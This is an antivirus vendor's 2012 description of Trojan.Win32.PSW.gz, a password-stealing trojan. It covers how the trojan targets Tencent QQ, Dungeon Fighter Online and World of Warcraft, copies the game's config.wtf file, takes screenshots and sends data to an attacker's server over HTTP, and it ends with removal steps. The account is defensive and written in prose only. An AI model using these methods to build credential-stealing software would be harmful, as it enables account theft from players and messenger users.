Trojan.Win32.PSW.gz

by alexander.adamov on May 7th, 2012 in Malware Descriptions.

Detect: Trojan.Win32.PSW.gz
Platform: Win32
Type:  
Trojan
Size:
61200 bytes

Packed:UPX
Unpacked size: 77072 bytes 
Language:C++   

Summary

Trojan.Win32.PSW.gz is a Trojan program designed to steal user passwords for online games and messenger clients.

Technical Details

Installation

The Trojan is installed by other malicious programs which have the capability to load the Trojan libraries to space addresses of all processes launched in the system.

Payload

Once launched, the Trojan checks the name of the original file of the process it runs in. The Trojan process is ended if the file has one of the following names:

  • QQLogin.exe. It is an executable file of Tencent QQ, the most popular instant messaging software client in mainland China.
  • DNF.exe. It is an executable file of Dungeon Fighter Online, online computer game.

If a file name is Wow.exe, the Trojan launches a separate thread. Wow.exe  is an executable file of World Of Warcraft, an online computer game.

In the thread, the Trojan steals login and password to the services indicated above.

In addition, the Trojan steals the content of the World of Warcraft configuration file:

            %WowFolder%\WTF\config.wtf

where %WowFolder% is the folder where the World of Warcraft game client is stored.

In addition, the Trojan has the capability to take snapshots of the screen and save them in the current user’s temporary folder with the «.jpg» extension.

The collected information is sent to the attacker’s server using parameters of the HTTP request.

Removal Recommendations

  1. Delete the original Trojan file (its file name and location depends on the way the Trojan originally penetrated a user’s computer).
  2. Run a full scan of your computer using the Antivirus program with the updated definition database (Download Ad-Aware Free).